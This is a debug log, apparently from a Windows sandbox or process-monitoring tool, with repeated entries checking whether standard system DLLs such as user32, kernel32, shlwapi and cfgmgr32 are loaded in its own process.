2020-03-24 10:13:48,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:49,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:49,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:49,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:49,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,308 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,308 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,385 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,385 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,385 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,433 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,433 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,433 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:49,526 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:49,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:49,542 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winbrand.dll
2020-03-24 10:13:49,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winbrand.dll
2020-03-24 10:13:49,558 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:49,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:49,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,558 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:49,573 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:49,573 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,619 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,619 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,619 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,619 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,713 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
2020-03-24 10:13:49,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
2020-03-24 10:13:49,713 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\propsys.dll
2020-03-24 10:13:49,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\propsys.dll
2020-03-24 10:13:49,730 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:49,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:49,730 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\clbcatq.dll
2020-03-24 10:13:49,744 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\clbcatq.dll
2020-03-24 10:13:49,744 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntmarta.dll
2020-03-24 10:13:49,744 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntmarta.dll
2020-03-24 10:13:49,760 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\Wldap32.dll
2020-03-24 10:13:49,760 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\Wldap32.dll
2020-03-24 10:13:49,760 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:13:49,760 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:13:49,776 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:13:49,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:13:49,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,822 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,822 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,854 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,854 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,854 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,869 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,869 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,869 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,869 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,885 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,885 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,885 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,901 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,901 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,931 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
